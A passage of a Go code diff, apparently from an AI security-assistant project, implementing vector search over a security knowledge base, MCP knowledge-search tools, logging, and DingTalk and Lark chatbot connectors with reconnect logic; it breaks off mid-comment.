return 0.0
}
return dotProduct / (math.Sqrt(normA) * math.Sqrt(normB))
}
// Search 搜索知识库。统一经 [VectorEinoRetriever]Eino retriever.Retriever 边界)。
func (r *Retriever) Search(ctx context.Context, req *SearchRequest) ([]*RetrievalResult, error) {
if req == nil {
return nil, fmt.Errorf("请求不能为空")
}
q := strings.TrimSpace(req.Query)
if q == "" {
return nil, fmt.Errorf("查询不能为空")
}
opts := r.einoRetrieverOptions(req)
docs, err := NewVectorEinoRetriever(r).Retrieve(ctx, q, opts...)
if err != nil {
return nil, err
}
return documentsToRetrievalResults(docs)
}
func (r *Retriever) einoRetrieverOptions(req *SearchRequest) []retriever.Option {
var opts []retriever.Option
if req.TopK > 0 {
opts = append(opts, retriever.WithTopK(req.TopK))
}
dsl := map[string]any{}
if strings.TrimSpace(req.RiskType) != "" {
dsl[DSLRiskType] = strings.TrimSpace(req.RiskType)
}
if req.Threshold > 0 {
dsl[DSLSimilarityThreshold] = req.Threshold
}
if strings.TrimSpace(req.SubIndexFilter) != "" {
dsl[DSLSubIndexFilter] = strings.TrimSpace(req.SubIndexFilter)
}
if len(dsl) > 0 {
opts = append(opts, retriever.WithDSLInfo(dsl))
}
return opts
}
// EinoRetrieve 直接返回 [schema.Document],供 Eino Graph / Chain 使用。
func (r *Retriever) EinoRetrieve(ctx context.Context, query string, opts ...retriever.Option) ([]*schema.Document, error) {
return NewVectorEinoRetriever(r).Retrieve(ctx, query, opts...)
}
func (r *Retriever) knowledgeEmbeddingSelectSQL(riskType, subIndexFilter string) (string, []interface{}) {
q := `SELECT e.id, e.item_id, e.chunk_index, e.chunk_text, e.embedding, e.embedding_model, e.embedding_dim, i.category, i.title
FROM knowledge_embeddings e
JOIN knowledge_base_items i ON e.item_id = i.id
WHERE 1=1`
var args []interface{}
if strings.TrimSpace(riskType) != "" {
q += ` AND TRIM(i.category) = TRIM(?) COLLATE NOCASE`
args = append(args, riskType)
}
if tag := strings.TrimSpace(subIndexFilter); tag != "" {
tag = strings.ToLower(strings.ReplaceAll(tag, " ", ""))
q += ` AND (TRIM(COALESCE(e.sub_indexes,'')) = '' OR INSTR(',' || LOWER(REPLACE(e.sub_indexes,' ','')) || ',', ',' || ? || ',') > 0)`
args = append(args, tag)
}
return q, args
}
// vectorSearch 纯向量检索:余弦相似度排序,按相似度阈值与 TopK 截断(无 BM25、无混合分、无邻块扩展)。
func (r *Retriever) vectorSearch(ctx context.Context, req *SearchRequest) ([]*RetrievalResult, error) {
if req.Query == "" {
return nil, fmt.Errorf("查询不能为空")
}
topK := req.TopK
if topK <= 0 && r.config != nil {
topK = r.config.TopK
}
if topK <= 0 {
topK = 5
}
threshold := req.Threshold
if threshold <= 0 && r.config != nil {
threshold = r.config.SimilarityThreshold
}
if threshold <= 0 {
threshold = 0.7
}
subIdxFilter := strings.TrimSpace(req.SubIndexFilter)
if subIdxFilter == "" && r.config != nil {
subIdxFilter = strings.TrimSpace(r.config.SubIndexFilter)
}
queryText := FormatQueryEmbeddingText(req.RiskType, req.Query)
queryEmbedding, err := r.embedder.EmbedText(ctx, queryText)
if err != nil {
return nil, fmt.Errorf("向量化查询失败: %w", err)
}
queryDim := len(queryEmbedding)
expectedModel := ""
if r.embedder != nil {
expectedModel = r.embedder.EmbeddingModelName()
}
sqlStr, sqlArgs := r.knowledgeEmbeddingSelectSQL(strings.TrimSpace(req.RiskType), subIdxFilter)
rows, err := r.db.QueryContext(ctx, sqlStr, sqlArgs...)
if err != nil {
return nil, fmt.Errorf("查询向量失败: %w", err)
}
defer rows.Close()
type candidate struct {
chunk *KnowledgeChunk
item *KnowledgeItem
similarity float64
}
candidates := make([]candidate, 0)
rowNum := 0
for rows.Next() {
rowNum++
if rowNum%48 == 0 {
select {
case <-ctx.Done():
return nil, ctx.Err()
default:
}
}
var chunkID, itemID, chunkText, embeddingJSON, category, title, rowModel string
var chunkIndex, rowDim int
if err := rows.Scan(&chunkID, &itemID, &chunkIndex, &chunkText, &embeddingJSON, &rowModel, &rowDim, &category, &title); err != nil {
r.logger.Warn("扫描向量失败", zap.Error(err))
continue
}
var embedding []float32
if err := json.Unmarshal([]byte(embeddingJSON), &embedding); err != nil {
r.logger.Warn("解析向量失败", zap.Error(err))
continue
}
if rowDim > 0 && len(embedding) != rowDim {
r.logger.Debug("跳过维度不一致的向量行", zap.String("chunkId", chunkID), zap.Int("rowDim", rowDim), zap.Int("got", len(embedding)))
continue
}
if queryDim > 0 && len(embedding) != queryDim {
r.logger.Debug("跳过与查询维度不一致的向量", zap.String("chunkId", chunkID), zap.Int("queryDim", queryDim), zap.Int("got", len(embedding)))
continue
}
if expectedModel != "" && strings.TrimSpace(rowModel) != "" && strings.TrimSpace(rowModel) != expectedModel {
r.logger.Debug("跳过嵌入模型不一致的行", zap.String("chunkId", chunkID), zap.String("rowModel", rowModel), zap.String("expected", expectedModel))
continue
}
similarity := cosineSimilarity(queryEmbedding, embedding)
candidates = append(candidates, candidate{
chunk: &KnowledgeChunk{
ID: chunkID,
ItemID: itemID,
ChunkIndex: chunkIndex,
ChunkText: chunkText,
Embedding: embedding,
},
item: &KnowledgeItem{
ID: itemID,
Category: category,
Title: title,
},
similarity: similarity,
})
}
sort.Slice(candidates, func(i, j int) bool {
return candidates[i].similarity > candidates[j].similarity
})
filtered := make([]candidate, 0, len(candidates))
for _, c := range candidates {
if c.similarity >= threshold {
filtered = append(filtered, c)
}
}
if len(filtered) > topK {
filtered = filtered[:topK]
}
results := make([]*RetrievalResult, len(filtered))
for i, c := range filtered {
results[i] = &RetrievalResult{
Chunk: c.chunk,
Item: c.item,
Similarity: c.similarity,
Score: c.similarity,
}
}
return results, nil
}
// AsEinoRetriever 将纯向量检索暴露为 Eino [retriever.Retriever]。
func (r *Retriever) AsEinoRetriever() retriever.Retriever {
return NewVectorEinoRetriever(r)
}
+51
View File
@@ -0,0 +1,51 @@
package knowledge
import (
"database/sql"
"fmt"
)
// EnsureKnowledgeEmbeddingsSchema migrates knowledge_embeddings for sub_indexes + embedding metadata.
func EnsureKnowledgeEmbeddingsSchema(db *sql.DB) error {
if db == nil {
return fmt.Errorf("db is nil")
}
var n int
if err := db.QueryRow(`SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name='knowledge_embeddings'`).Scan(&n); err != nil {
return err
}
if n == 0 {
return nil
}
if err := addKnowledgeEmbeddingsColumnIfMissing(db, "sub_indexes",
`ALTER TABLE knowledge_embeddings ADD COLUMN sub_indexes TEXT NOT NULL DEFAULT ''`); err != nil {
return err
}
if err := addKnowledgeEmbeddingsColumnIfMissing(db, "embedding_model",
`ALTER TABLE knowledge_embeddings ADD COLUMN embedding_model TEXT NOT NULL DEFAULT ''`); err != nil {
return err
}
if err := addKnowledgeEmbeddingsColumnIfMissing(db, "embedding_dim",
`ALTER TABLE knowledge_embeddings ADD COLUMN embedding_dim INTEGER NOT NULL DEFAULT 0`); err != nil {
return err
}
return nil
}
func addKnowledgeEmbeddingsColumnIfMissing(db *sql.DB, column, alterSQL string) error {
var colCount int
q := `SELECT COUNT(*) FROM pragma_table_info('knowledge_embeddings') WHERE name = ?`
if err := db.QueryRow(q, column).Scan(&colCount); err != nil {
return err
}
if colCount > 0 {
return nil
}
_, err := db.Exec(alterSQL)
return err
}
// ensureKnowledgeEmbeddingsSubIndexesColumn 向后兼容;请使用 [EnsureKnowledgeEmbeddingsSchema]。
func ensureKnowledgeEmbeddingsSubIndexesColumn(db *sql.DB) error {
return EnsureKnowledgeEmbeddingsSchema(db)
}
+323
View File
@@ -0,0 +1,323 @@
package knowledge
import (
"context"
"encoding/json"
"fmt"
"sort"
"strings"
"cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/mcp/builtin"
"go.uber.org/zap"
)
// RegisterKnowledgeTool 注册知识检索工具到MCP服务器
func RegisterKnowledgeTool(
mcpServer *mcp.Server,
retriever *Retriever,
manager *Manager,
logger *zap.Logger,
) {
// 注册第一个工具:获取所有可用的风险类型列表
listRiskTypesTool := mcp.Tool{
Name: builtin.ToolListKnowledgeRiskTypes,
Description: "获取知识库中所有可用的风险类型(risk_type)列表。在搜索知识库之前,可以先调用此工具获取可用的风险类型,然后使用正确的风险类型进行精确搜索,这样可以大幅减少检索时间并提高检索准确性。",
ShortDescription: "获取知识库中所有可用的风险类型列表",
InputSchema: map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{},
"required": []string{},
},
}
listRiskTypesHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
categories, err := manager.GetCategories()
if err != nil {
logger.Error("获取风险类型列表失败", zap.Error(err))
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: fmt.Sprintf("获取风险类型列表失败: %v", err),
},
},
IsError: true,
}, nil
}
if len(categories) == 0 {
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: "知识库中暂无风险类型。",
},
},
}, nil
}
var resultText strings.Builder
resultText.WriteString(fmt.Sprintf("知识库中共有 %d 个风险类型:\n\n", len(categories)))
for i, category := range categories {
resultText.WriteString(fmt.Sprintf("%d. %s\n", i+1, category))
}
resultText.WriteString("\n提示:在调用 " + builtin.ToolSearchKnowledgeBase + " 工具时,可以使用上述风险类型之一作为 risk_type 参数,以缩小搜索范围并提高检索效率。")
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: resultText.String(),
},
},
}, nil
}
mcpServer.RegisterTool(listRiskTypesTool, listRiskTypesHandler)
logger.Info("风险类型列表工具已注册", zap.String("toolName", listRiskTypesTool.Name))
// 注册第二个工具:搜索知识库(保持原有功能)
searchTool := mcp.Tool{
Name: builtin.ToolSearchKnowledgeBase,
Description: "在知识库中搜索相关的安全知识。当你需要了解特定漏洞类型、攻击技术、检测方法等安全知识时,可以使用此工具进行检索。工具基于向量嵌入与余弦相似度检索(与 Eino retriever 语义一致)。建议:在搜索前可以先调用 " + builtin.ToolListKnowledgeRiskTypes + " 工具获取可用的风险类型,然后使用正确的 risk_type 参数进行精确搜索,这样可以大幅减少检索时间。",
ShortDescription: "搜索知识库中的安全知识(向量语义检索)",
InputSchema: map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{
"query": map[string]interface{}{
"type": "string",
"description": "搜索查询内容,描述你想要了解的安全知识主题",
},
"risk_type": map[string]interface{}{
"type": "string",
"description": "可选:指定风险类型(如:SQL注入、XSS、文件上传等)。建议先调用 " + builtin.ToolListKnowledgeRiskTypes + " 工具获取可用的风险类型列表,然后使用正确的风险类型进行精确搜索,这样可以大幅减少检索时间。如果不指定则搜索所有类型。",
},
},
"required": []string{"query"},
},
}
searchHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
query, ok := args["query"].(string)
if !ok || query == "" {
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: "错误: 查询参数不能为空",
},
},
IsError: true,
}, nil
}
riskType := ""
if rt, ok := args["risk_type"].(string); ok && rt != "" {
riskType = rt
}
logger.Info("执行知识库检索",
zap.String("query", query),
zap.String("riskType", riskType),
)
// 检索统一走 Retriever.Search → VectorEinoRetrieverEino retriever 语义)。
searchReq := &SearchRequest{
Query: query,
RiskType: riskType,
TopK: 5,
}
results, err := retriever.Search(ctx, searchReq)
if err != nil {
logger.Error("知识库检索失败", zap.Error(err))
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: fmt.Sprintf("检索失败: %v", err),
},
},
IsError: true,
}, nil
}
if len(results) == 0 {
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: fmt.Sprintf("未找到与查询 '%s' 相关的知识。建议:\n1. 尝试使用不同的关键词\n2. 检查风险类型是否正确\n3. 确认知识库中是否包含相关内容", query),
},
},
}, nil
}
// 格式化结果
var resultText strings.Builder
// 按余弦相似度(Score)降序
sort.Slice(results, func(i, j int) bool {
return results[i].Score > results[j].Score
})
// 按文档分组结果,以便更好地展示上下文
type itemGroup struct {
itemID string
results []*RetrievalResult
maxScore float64 // 该文档块的最高相似度
}
itemGroups := make([]*itemGroup, 0)
itemMap := make(map[string]*itemGroup)
for _, result := range results {
itemID := result.Item.ID
group, exists := itemMap[itemID]
if !exists {
group = &itemGroup{
itemID: itemID,
results: make([]*RetrievalResult, 0),
maxScore: result.Score,
}
itemMap[itemID] = group
itemGroups = append(itemGroups, group)
}
group.results = append(group.results, result)
if result.Score > group.maxScore {
group.maxScore = result.Score
}
}
// 按文档内最高相似度排序
sort.Slice(itemGroups, func(i, j int) bool {
return itemGroups[i].maxScore > itemGroups[j].maxScore
})
// 收集检索到的知识项ID(用于日志)
retrievedItemIDs := make([]string, 0, len(itemGroups))
resultText.WriteString(fmt.Sprintf("找到 %d 条相关知识片段:\n\n", len(results)))
resultIndex := 1
for _, group := range itemGroups {
itemResults := group.results
mainResult := itemResults[0]
maxScore := mainResult.Score
for _, result := range itemResults {
if result.Score > maxScore {
maxScore = result.Score
mainResult = result
}
}
// 按chunk_index排序,保证阅读的逻辑顺序(文档的原始顺序)
sort.Slice(itemResults, func(i, j int) bool {
return itemResults[i].Chunk.ChunkIndex < itemResults[j].Chunk.ChunkIndex
})
resultText.WriteString(fmt.Sprintf("--- 结果 %d (相似度: %.2f%%) ---\n",
resultIndex, mainResult.Similarity*100))
resultText.WriteString(fmt.Sprintf("来源: [%s] %s (ID: %s)\n", mainResult.Item.Category, mainResult.Item.Title, mainResult.Item.ID))
// 按逻辑顺序显示所有chunk(包括主结果和扩展的chunk)
if len(itemResults) == 1 {
// 只有一个chunk,直接显示
resultText.WriteString(fmt.Sprintf("内容片段:\n%s\n", mainResult.Chunk.ChunkText))
} else {
// 多个chunk,按逻辑顺序显示
resultText.WriteString("内容片段(按文档顺序):\n")
for i, result := range itemResults {
// 标记主结果
marker := ""
if result.Chunk.ID == mainResult.Chunk.ID {
marker = " [主匹配]"
}
resultText.WriteString(fmt.Sprintf(" [片段 %d%s]\n%s\n", i+1, marker, result.Chunk.ChunkText))
}
}
resultText.WriteString("\n")
if !contains(retrievedItemIDs, group.itemID) {
retrievedItemIDs = append(retrievedItemIDs, group.itemID)
}
resultIndex++
}
// 在结果末尾添加元数据(JSON格式,用于提取知识项ID)
// 使用特殊标记,避免影响AI阅读结果
if len(retrievedItemIDs) > 0 {
metadataJSON, _ := json.Marshal(map[string]interface{}{
"_metadata": map[string]interface{}{
"retrievedItemIDs": retrievedItemIDs,
},
})
resultText.WriteString(fmt.Sprintf("\n<!-- METADATA: %s -->", string(metadataJSON)))
}
// 记录检索日志(异步,不阻塞)
// 注意:这里没有conversationID和messageID,需要在Agent层面记录
// 实际的日志记录应该在Agent的progressCallback中完成
return &mcp.ToolResult{
Content: []mcp.Content{
{
Type: "text",
Text: resultText.String(),
},
},
}, nil
}
mcpServer.RegisterTool(searchTool, searchHandler)
logger.Info("知识检索工具已注册", zap.String("toolName", searchTool.Name))
}
// contains 检查切片是否包含元素
func contains(slice []string, item string) bool {
for _, s := range slice {
if s == item {
return true
}
}
return false
}
// GetRetrievalMetadata 从工具调用中提取检索元数据(用于日志记录)
func GetRetrievalMetadata(args map[string]interface{}) (query string, riskType string) {
if q, ok := args["query"].(string); ok {
query = q
}
if rt, ok := args["risk_type"].(string); ok {
riskType = rt
}
return
}
// FormatRetrievalResults 格式化检索结果为字符串(用于日志)
func FormatRetrievalResults(results []*RetrievalResult) string {
if len(results) == 0 {
return "未找到相关结果"
}
var builder strings.Builder
builder.WriteString(fmt.Sprintf("检索到 %d 条结果:\n", len(results)))
itemIDs := make(map[string]bool)
for i, result := range results {
builder.WriteString(fmt.Sprintf("%d. [%s] %s (相似度: %.2f%%)\n",
i+1, result.Item.Category, result.Item.Title, result.Similarity*100))
itemIDs[result.Item.ID] = true
}
// 返回知识项ID列表(JSON格式)
ids := make([]string, 0, len(itemIDs))
for id := range itemIDs {
ids = append(ids, id)
}
idsJSON, _ := json.Marshal(ids)
builder.WriteString(fmt.Sprintf("\n检索到的知识项ID: %s", string(idsJSON)))
return builder.String()
}
+123
View File
@@ -0,0 +1,123 @@
package knowledge
import (
"encoding/json"
"time"
)
// formatTime 格式化时间为 RFC3339 格式,零时间返回空字符串
func formatTime(t time.Time) string {
if t.IsZero() {
return ""
}
return t.Format(time.RFC3339)
}
// KnowledgeItem 知识库项
type KnowledgeItem struct {
ID string `json:"id"`
Category string `json:"category"` // 风险类型(文件夹名)
Title string `json:"title"` // 标题(文件名)
FilePath string `json:"filePath"` // 文件路径
Content string `json:"content"` // 文件内容
CreatedAt time.Time `json:"createdAt"`
UpdatedAt time.Time `json:"updatedAt"`
}
// KnowledgeItemSummary 知识库项摘要(用于列表,不包含完整内容)
type KnowledgeItemSummary struct {
ID string `json:"id"`
Category string `json:"category"`
Title string `json:"title"`
FilePath string `json:"filePath"`
Content string `json:"content,omitempty"` // 可选:内容预览(如果提供,通常只包含前 150 字符)
CreatedAt time.Time `json:"createdAt"`
UpdatedAt time.Time `json:"updatedAt"`
}
// MarshalJSON 自定义 JSON 序列化,确保时间格式正确
func (k *KnowledgeItemSummary) MarshalJSON() ([]byte, error) {
type Alias KnowledgeItemSummary
aux := &struct {
*Alias
CreatedAt string `json:"createdAt"`
UpdatedAt string `json:"updatedAt"`
}{
Alias: (*Alias)(k),
}
aux.CreatedAt = formatTime(k.CreatedAt)
aux.UpdatedAt = formatTime(k.UpdatedAt)
return json.Marshal(aux)
}
// MarshalJSON 自定义 JSON 序列化,确保时间格式正确
func (k *KnowledgeItem) MarshalJSON() ([]byte, error) {
type Alias KnowledgeItem
aux := &struct {
*Alias
CreatedAt string `json:"createdAt"`
UpdatedAt string `json:"updatedAt"`
}{
Alias: (*Alias)(k),
}
aux.CreatedAt = formatTime(k.CreatedAt)
aux.UpdatedAt = formatTime(k.UpdatedAt)
return json.Marshal(aux)
}
// KnowledgeChunk 知识块(用于向量化)
type KnowledgeChunk struct {
ID string `json:"id"`
ItemID string `json:"itemId"`
ChunkIndex int `json:"chunkIndex"`
ChunkText string `json:"chunkText"`
Embedding []float32 `json:"-"` // 向量嵌入,不序列化到 JSON
CreatedAt time.Time `json:"createdAt"`
}
// RetrievalResult 检索结果
type RetrievalResult struct {
Chunk *KnowledgeChunk `json:"chunk"`
Item *KnowledgeItem `json:"item"`
Similarity float64 `json:"similarity"` // 相似度分数
Score float64 `json:"score"` // 与 Similarity 相同:余弦相似度
}
// RetrievalLog 检索日志
type RetrievalLog struct {
ID string `json:"id"`
ConversationID string `json:"conversationId,omitempty"`
MessageID string `json:"messageId,omitempty"`
Query string `json:"query"`
RiskType string `json:"riskType,omitempty"`
RetrievedItems []string `json:"retrievedItems"` // 检索到的知识项 ID 列表
CreatedAt time.Time `json:"createdAt"`
}
// MarshalJSON 自定义 JSON 序列化,确保时间格式正确
func (r *RetrievalLog) MarshalJSON() ([]byte, error) {
type Alias RetrievalLog
return json.Marshal(&struct {
*Alias
CreatedAt string `json:"createdAt"`
}{
Alias: (*Alias)(r),
CreatedAt: formatTime(r.CreatedAt),
})
}
// CategoryWithItems 分类及其下的知识项(用于按分类分页)
type CategoryWithItems struct {
Category string `json:"category"` // 分类名称
ItemCount int `json:"itemCount"` // 该分类下的知识项总数
Items []*KnowledgeItemSummary `json:"items"` // 该分类下的知识项列表
}
// SearchRequest 搜索请求
type SearchRequest struct {
Query string `json:"query"`
RiskType string `json:"riskType,omitempty"` // 可选:指定风险类型
SubIndexFilter string `json:"subIndexFilter,omitempty"` // 可选:仅保留 sub_indexes 含该标签的行(含未打标旧数据)
TopK int `json:"topK,omitempty"` // 返回 Top-K 结果,默认 5
Threshold float64 `json:"threshold,omitempty"` // 相似度阈值,默认 0.7
}
+68
View File
@@ -0,0 +1,68 @@
package logger
import (
"os"
"go.uber.org/zap"
"go.uber.org/zap/zapcore"
)
type Logger struct {
*zap.Logger
}
func New(level, output string) *Logger {
var zapLevel zapcore.Level
switch level {
case "debug":
zapLevel = zapcore.DebugLevel
case "info":
zapLevel = zapcore.InfoLevel
case "warn":
zapLevel = zapcore.WarnLevel
case "error":
zapLevel = zapcore.ErrorLevel
default:
zapLevel = zapcore.InfoLevel
}
config := zap.NewProductionConfig()
config.Level = zap.NewAtomicLevelAt(zapLevel)
config.EncoderConfig.TimeKey = "timestamp"
config.EncoderConfig.EncodeTime = zapcore.ISO8601TimeEncoder
var writeSyncer zapcore.WriteSyncer
if output == "stdout" {
writeSyncer = zapcore.AddSync(os.Stdout)
} else {
file, err := os.OpenFile(output, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0666)
if err != nil {
writeSyncer = zapcore.AddSync(os.Stdout)
} else {
writeSyncer = zapcore.AddSync(file)
}
}
core := zapcore.NewCore(
zapcore.NewJSONEncoder(config.EncoderConfig),
writeSyncer,
zapLevel,
)
logger := zap.New(core, zap.AddCaller(), zap.AddStacktrace(zapcore.ErrorLevel))
return &Logger{Logger: logger}
}
func (l *Logger) Fatal(msg string, fields ...interface{}) {
zapFields := make([]zap.Field, 0, len(fields))
for _, f := range fields {
switch v := f.(type) {
case error:
zapFields = append(zapFields, zap.Error(v))
default:
zapFields = append(zapFields, zap.Any("field", v))
}
}
l.Logger.Fatal(msg, zapFields...)
}
+6
View File
@@ -0,0 +1,6 @@
package robot
// MessageHandler 供飞书/钉钉长连接调用的消息处理接口(由 handler.RobotHandler 实现)
type MessageHandler interface {
HandleMessage(platform, userID, text string) string
}
+151
View File
@@ -0,0 +1,151 @@
package robot
import (
"bytes"
"context"
"encoding/json"
"net/http"
"strings"
"time"
"cyberstrike-ai/internal/config"
"github.com/open-dingtalk/dingtalk-stream-sdk-go/chatbot"
"github.com/open-dingtalk/dingtalk-stream-sdk-go/client"
dingutils "github.com/open-dingtalk/dingtalk-stream-sdk-go/utils"
"go.uber.org/zap"
)
const (
dingReconnectInitial = 5 * time.Second // 首次重连间隔
dingReconnectMax = 60 * time.Second // 最大重连间隔
)
// StartDing 启动钉钉 Stream 长连接(无需公网),收到消息后调用 handler 并通过 SessionWebhook 回复。
// 断线(如笔记本睡眠、网络中断)后会自动重连;ctx 被取消时退出,便于配置变更时重启。
func StartDing(ctx context.Context, robotsCfg config.RobotsConfig, h MessageHandler, logger *zap.Logger) {
cfg := robotsCfg.Dingtalk
if !cfg.Enabled || cfg.ClientID == "" || cfg.ClientSecret == "" {
return
}
go runDingLoop(ctx, cfg, robotsCfg.Session.StrictUserIdentityEnabled(), h, logger)
}
// runDingLoop 循环维持钉钉长连接:断开且 ctx 未取消时按退避间隔重连。
func runDingLoop(ctx context.Context, cfg config.RobotDingtalkConfig, strictUserIdentity bool, h MessageHandler, logger *zap.Logger) {
backoff := dingReconnectInitial
for {
streamClient := client.NewStreamClient(
client.WithAppCredential(client.NewAppCredentialConfig(cfg.ClientID, cfg.ClientSecret)),
client.WithSubscription(dingutils.SubscriptionTypeKCallback, "/v1.0/im/bot/messages/get",
chatbot.NewDefaultChatBotFrameHandler(func(ctx context.Context, msg *chatbot.BotCallbackDataModel) ([]byte, error) {
go handleDingMessage(ctx, msg, cfg, strictUserIdentity, h, logger)
return nil, nil
}).OnEventReceived),
)
logger.Info("钉钉 Stream 正在连接…", zap.String("client_id", cfg.ClientID))
err := streamClient.Start(ctx)
if ctx.Err() != nil {
logger.Info("钉钉 Stream 已按配置重启关闭")
return
}
if err != nil {
logger.Warn("钉钉 Stream 长连接断开(如睡眠/断网),将自动重连", zap.Error(err), zap.Duration("retry_after", backoff))
}
select {
case <-ctx.Done():
return
case <-time.After(backoff):
// 下次重连间隔递增,上限 60 秒,避免频繁重试
if backoff < dingReconnectMax {
backoff *= 2
if backoff > dingReconnectMax {
backoff = dingReconnectMax
}
}
}
}
}
func handleDingMessage(ctx context.Context, msg *chatbot.BotCallbackDataModel, cfg config.RobotDingtalkConfig, strictUserIdentity bool, h MessageHandler, logger *zap.Logger) {
if msg == nil || msg.SessionWebhook == "" {
return
}
content := ""
if msg.Text.Content != "" {
content = strings.TrimSpace(msg.Text.Content)
}
if content == "" && msg.Msgtype == "richText" {
if cMap, ok := msg.Content.(map[string]interface{}); ok {
if rich, ok := cMap["richText"].([]interface{}); ok {
for _, c := range rich {
if m, ok := c.(map[string]interface{}); ok {
if txt, ok := m["text"].(string); ok {
content = strings.TrimSpace(txt)
break
}
}
}
}
}
}
if content == "" {
logger.Debug("钉钉消息内容为空,已忽略", zap.String("msgtype", msg.Msgtype))
return
}
logger.Info("钉钉收到消息", zap.String("sender", msg.SenderId), zap.String("content", content))
tenantKey := strings.TrimSpace(cfg.ClientID)
if tenantKey == "" {
tenantKey = "default"
}
userID := strings.TrimSpace(msg.SenderId)
if userID != "" {
userID = "t:" + tenantKey + "|u:" + userID
} else if cfg.AllowConversationIDFallback && !strictUserIdentity {
conversationID := strings.TrimSpace(msg.ConversationId)
if conversationID != "" {
userID = "t:" + tenantKey + "|c:" + conversationID
}
}
if userID == "" {
logger.Warn("钉钉消息缺少可用用户标识,已忽略")
return
}
reply := h.HandleMessage("dingtalk", userID, content)
// 使用 markdown 类型以便正确展示标题、列表、代码块等格式
title := reply
if idx := strings.IndexAny(reply, "\n"); idx > 0 {
title = strings.TrimSpace(reply[:idx])
}
if len(title) > 50 {
title = title[:50] + "…"
}
if title == "" {
title = "回复"
}
body := map[string]interface{}{
"msgtype": "markdown",
"markdown": map[string]string{
"title": title,
"text": reply,
},
}
bodyBytes, _ := json.Marshal(body)
req, err := http.NewRequestWithContext(ctx, http.MethodPost, msg.SessionWebhook, bytes.NewReader(bodyBytes))
if err != nil {
logger.Warn("钉钉构造回复请求失败", zap.Error(err))
return
}
req.Header.Set("Content-Type", "application/json")
resp, err := http.DefaultClient.Do(req)
if err != nil {
logger.Warn("钉钉回复请求失败", zap.Error(err))
return
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
logger.Warn("钉钉回复非 200", zap.Int("status", resp.StatusCode))
return
}
logger.Debug("钉钉回复成功", zap.String("content_preview", reply))
}
+141
View File
@@ -0,0 +1,141 @@
package robot
import (
"context"
"encoding/json"
"strings"
"time"
"cyberstrike-ai/internal/config"
lark "github.com/larksuite/oapi-sdk-go/v3"
larkcore "github.com/larksuite/oapi-sdk-go/v3/core"
"github.com/larksuite/oapi-sdk-go/v3/event/dispatcher"
larkim "github.com/larksuite/oapi-sdk-go/v3/service/im/v1"
larkws "github.com/larksuite/oapi-sdk-go/v3/ws"
"go.uber.org/zap"
)
const (
larkReconnectInitial = 5 * time.Second // 首次重连间隔
larkReconnectMax = 60 * time.Second // 最大重连间隔
)
type larkTextContent struct {
Text string `json:"text"`
}
// StartLark 启动飞书长连接(无需公网),收到消息后调用 handler 并回复。
// 断线(如笔记本睡眠、网络中断)后会自动重连;ctx 被取消时退出,便于配置变更时重启。
func StartLark(ctx context.Context, robotsCfg config.RobotsConfig, h MessageHandler, logger *zap.Logger) {
cfg := robotsCfg.Lark
if !cfg.Enabled || cfg.AppID == "" || cfg.AppSecret == "" {
return
}
go runLarkLoop(ctx, cfg, robotsCfg.Session.StrictUserIdentityEnabled(), h, logger)
}
// runLarkLoop 循环维持飞书长连接:断开且 ctx 未取消时按退避间隔重连。
func runLarkLoop(ctx context.Context, cfg config.RobotLarkConfig, strictUserIdentity bool, h MessageHandler, logger *zap.Logger) {
backoff := larkReconnectInitial
for {
larkClient := lark.NewClient(cfg.AppID, cfg.AppSecret)
eventHandler := dispatcher.NewEventDispatcher("", "").OnP2MessageReceiveV1(func(ctx context.Context, event *larkim.P2MessageReceiveV1) error {
go handleLarkMessage(ctx, event, cfg, strictUserIdentity, h, larkClient, logger)
return nil
})
wsClient := larkws.NewClient(cfg.AppID, cfg.AppSecret,
larkws.WithEventHandler(eventHandler),
larkws.WithLogLevel(larkcore.LogLevelInfo),
)
logger.Info("飞书长连接正在连接…", zap.String("app_id", cfg.AppID))
err := wsClient.Start(ctx)
if ctx.Err() != nil {
logger.Info("飞书长连接已按配置重启关闭")
return
}
if err != nil {
logger.Warn("飞书长连接断开(如睡眠/断网),将自动重连", zap.Error(err), zap.Duration("retry_after", backoff))
}
select {
case <-ctx.Done():
return
case <-time.After(backoff):
if backoff < larkReconnectMax {
backoff *= 2
if backoff > larkReconnectMax {
backoff = larkReconnectMax
}
}
}
}
}
func handleLarkMessage(ctx context.Context, event *larkim.P2MessageReceiveV1, cfg config.RobotLarkConfig, strictUserIdentity bool, h MessageHandler, client *lark.Client, logger *zap.Logger) {
if event == nil || event.Event == nil || event.Event.Message == nil || event.Event.Sender == nil || event.Event.Sender.SenderId == nil {
return
}
msg := event.Event.Message
msgType := larkcore.StringValue(msg.MessageType)
if msgType != larkim.MsgTypeText {
logger.Debug("飞书暂仅处理文本消息", zap.String("msg_type", msgType))
return
}
var textBody larkTextContent
if err := json.Unmarshal([]byte(larkcore.StringValue(msg.Content)), &textBody); err != nil {
logger.Warn("飞书消息 Content 解析失败", zap.Error(err))
return
}
text := strings.TrimSpace(textBody.Text)
if text == "" {
return
}
userID := resolveLarkUserID(event, cfg.AllowChatIDFallback && !strictUserIdentity)
if userID == "" {
logger.Warn("飞书消息缺少可用用户标识,已忽略")
return
}
messageID := larkcore.StringValue(msg.MessageId)
reply := h.HandleMessage("lark", userID, text)
contentBytes, _ := json.Marshal(larkTextContent{Text: reply})
_, err := client.Im.Message.Reply(ctx, larkim.NewReplyMessageReqBuilder().
MessageId(messageID).
Body(larkim.NewReplyMessageReqBodyBuilder().
MsgType(larkim.MsgTypeText).
Content(string(contentBytes)).
Build()).
Build())
if err != nil {
logger.Warn("飞书回复失败", zap.String("message_id", messageID), zap.Error(err))
return
}
logger.Debug("飞书已回复", zap.String("message_id", messageID))
}
// resolveLarkUserID 提取飞书会话隔离键:
